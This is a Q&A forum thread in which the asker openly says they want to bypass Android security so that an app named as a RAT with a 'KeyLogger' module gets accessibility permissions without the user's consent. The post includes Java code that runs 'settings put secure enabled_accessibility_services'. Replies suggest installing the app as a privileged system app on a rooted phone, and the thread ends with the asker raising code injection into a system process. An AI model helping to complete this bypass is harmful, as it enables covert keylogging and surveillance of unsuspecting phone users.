0

I am trying to bypass Android Security and enabling my Application to get Accessibility Permissions without asking the user to do it.
Searching around in StackOverflow i found out that is possible, click here to see, by using the InstrumentationRegistry, however that class is now deprecated and so i started using the Process class and launching the method you can see above:

String packageName = "com.example.rat";
String serviceName = packageName+"/"+"rat.modules.KeyLogger";
String service = "enabled_accessibility_services";
String cmd = "settings put secure "+service+" "+serviceName;
System.out.println("Command: "+cmd);
Scanner s = new Scanner(cmd);
s.useDelimiter(" ");
Process p = Runtime.getRuntime().exec(new String[]{s.next(),s.next(),s.next(),s.next(),s.next()});
String error = "";
String line = "";
BufferedReader br = new BufferedReader(new InputStreamReader(p.getErrorStream()));
while ((line = br.readLine()) != null) {
    error += line;
}
System.out.println("Response: "+error);

The error i get from the previously shown code is here:

Security exception: You either need MANAGE_USERS or CREATE_USERS permission to: query userjava.lang.SecurityException: You either need MANAGE_USERS or CREATE_USERS permission to: query user at com.android.server.pm.UserManagerService.checkManageOrCreateUsersPermission(UserManagerService.java:1854) at com.android.server.pm.UserManagerService.getUserInfo(UserManagerService.java:1039) at android.os.UserManager.getUserInfo(UserManager.java:1366) at com.android.providers.settings.SettingsService$MyShellCommand.onCommand(SettingsService.java:273) at android.os.ShellCommand.exec(ShellCommand.java:96) at com.android.providers.settings.SettingsService.onShellCommand(SettingsService.java:51) at android.os.Binder.shellCommand(Binder.java:581) at android.os.Binder.onTransact(Binder.java:481) at android.os.Binder.execTransact(Binder.java:682)

Is there anyway to bypass it? i am open to every kind of idea.

Naresh
  • 16,698
  • 6
  • 112
  • 113
DRE
  • 263
  • 8
  • 35

1 Answers1

2

Only system apps can use this permission. If your phone is rooted, move your app at /system/priv-app folder The permissions you need are 

<uses-permission android:name="android.permission.INTERACT_ACROSS_USERS" />

and 

<uses-permission android:name="android.permission.MANAGE_USERS" />
Christos Themelis
  • 179
  • 4
  • I give a +1 for the answer(that can be helpful), but in the link i gave in the question someone said that it is possible to do it without your application being a system app, i am thinking of opening an OutputStream in a System app process and send commands through it, is this possible? – DRE Mar 01 '19 at 08:53
  • No, it cannot be done this way. I am writting system apps for a company, I know. For the second one you say, if you have a system app that can wait your commands and execute them, this is another story. Of course a lot of things are changing for every new Android version. At newer versions restricts developers at a lot of points – Christos Themelis Mar 01 '19 at 09:17
  • Ok, my second idea was to start a system app via intent and inject code in the process, but i don't know if this is possible. – DRE Mar 01 '19 at 09:55
  • This sounds like virus activity :) I never check it if can be done, but think about that every process has it own protected memory. So this will cause a memory protection fault. – Christos Themelis Mar 01 '19 at 10:17
  • That's what i am trying to achive, thanks for the help, if you got some news about this topic please let me updated. – DRE Mar 01 '19 at 10:30
  • I found out Dexmaker that is ment to do what i said before(inject code into a running app). – DRE Mar 01 '19 at 10:58